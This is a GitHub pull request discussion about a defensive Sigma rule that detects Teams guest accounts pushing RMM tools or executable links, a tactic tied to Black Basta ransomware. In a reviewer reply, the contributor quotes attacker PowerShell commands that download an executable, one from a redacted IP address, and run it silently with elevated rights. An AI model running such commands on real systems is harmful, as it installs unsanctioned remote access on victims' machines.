Create microsoft365_teams_guest_rmm_deployment.yml #5066
Conversation
This Sigma rule is designed to detect potential malicious guest accounts using onmicrosoft.com domains and the deployment of Remote Monitoring and Management (RMM) tools via Teams messages. The rule identifies emails containing links to executable files or known RMM tool URLs. This detection is crucial for preventing attackers from gaining unauthorized access through email bombing and subsequent fake IT support messages that lead to ransomware deployment. reference: https://www.bleepingcomputer.com/news/security/black-basta-ransomware-poses-as-it-support-on-microsoft-teams-to-breach-networks/?form=MG0AV3 https://securityaffairs.com/170311/cyber-crime/black-basta-ransomware-microsoft-teams.html?form=MG0AV3
|
thanks for the contribution @prashanthpulisetti Before i can review this please make sure that your rule conforms to the rules here in the repo and the standard.
Thanks |
|
Hi @nasbench, thanks for the suggestions, I will make sure to adjust them. |
Removed fields adjusted logsources
They were not suggestions but requirements 😛 haha |
adjusted level and falsepositivies
updated author name
There was a problem hiding this comment.
@prashanthpulisetti can you please provide the full log and not a stripped down version?
rules/cloud/m365/audit/microsoft365_teams_guest_rmm_deployment.yml
Outdated
Show resolved
Hide resolved
| - .exe | ||
| - .msi | ||
| - .js |
There was a problem hiding this comment.
What's the reasoning behind selecting these extensions and not something else?
There was a problem hiding this comment.
Hi @nasbench ; recently I was working with a client and they had a massive email bombing attack followed by an teams guest message and then they sent a payload which contains a fake RMM tool so there are two messages the attacker sent via teams one is directly https://anydesk.com which is something similar to
Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://download.anydesk.com/AnyDesk.exe" -OutFile "$env:TEMP\AnyDesk.exe"; Start-Process -FilePath "$env:TEMP\AnyDesk.exe" -ArgumentList "/silent" -Wait; Remove-Item -Path "$env:TEMP\AnyDesk.exe" -Force' -Verb RunAs
and there is another message with IP as their URL ( could be a C2C ) :
Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://xxx.xx.xx.xx/RMM.exe" -OutFile "$env:TEMP\AnyDesk.exe"; Start-Process -FilePath "$env:TEMP\AnyDesk.exe" -ArgumentList "/silent" -Wait; Remove-Item -Path "$env:TEMP\AnyDesk.exe" -Force' -Verb RunAs
So this is the reason why I've kept with .exe, .msi or .js.
rules/cloud/m365/audit/microsoft365_teams_guest_rmm_deployment.yml
Outdated
Show resolved
Hide resolved
rules/cloud/m365/audit/microsoft365_teams_guest_rmm_deployment.yml
Outdated
Show resolved
Hide resolved
| title: Detection of Potential Malicious Guest Accounts and RMM Tool Deployment via Teams | ||
| id: aed9c24f-097a-4505-af85-74b4b83982b0 | ||
| status: experimental | ||
| description: Detects potential malicious guest accounts using onmicrosoft.com and deployment of RMM tools via Teams messages. |
There was a problem hiding this comment.
This doesn't really makes a lot of sense, can you please rephrase it. What's the relation between guest accounts and deployment of RMMs?
There was a problem hiding this comment.
As I mentioned in the notes below, attackers are using Teams channels to send Remote Monitoring and Management (RMM) software, posing as fake Microsoft support agents and asking end users to download these RMM tools under the guise of troubleshooting assistance.
nasbench
added
the
Author Input Required
….yml Co-authored-by: Nasreddine Bencherchali <[email protected]>
….yml Co-authored-by: Nasreddine Bencherchali <[email protected]>
added contains for message URLs
|
please see the original log: |
This Sigma rule is designed to detect potential malicious guest accounts using onmicrosoft.com domains and the deployment of Remote Monitoring and Management (RMM) tools via Teams messages. The rule identifies emails containing links to executable files or known RMM tool URLs. This detection is crucial for preventing attackers from gaining unauthorized access through email bombing and subsequent fake IT support messages that lead to ransomware deployment.
reference:
https://www.bleepingcomputer.com/news/security/black-basta-ransomware-poses-as-it-support-on-microsoft-teams-to-breach-networks/?form=MG0AV3 https://securityaffairs.com/170311/cyber-crime/black-basta-ransomware-microsoft-teams.html?form=MG0AV3
Summary of the Pull Request
Changelog
Created a Sigma rule to detect malicious guest accounts and RMM tool deployment via Teams.
Integrated detection for email patterns indicative of executable files and known RMM tool URLs.
Added references to recent incidents involving Black Basta ransomware using Microsoft Teams.
Example Log Event
{
"user.email": "[email protected]",
"o365.audit.MessageURLs": "https://downloads.level.io/install_windows.exe"
}
Fixed Issues
SigmaHQ Rule Creation Conventions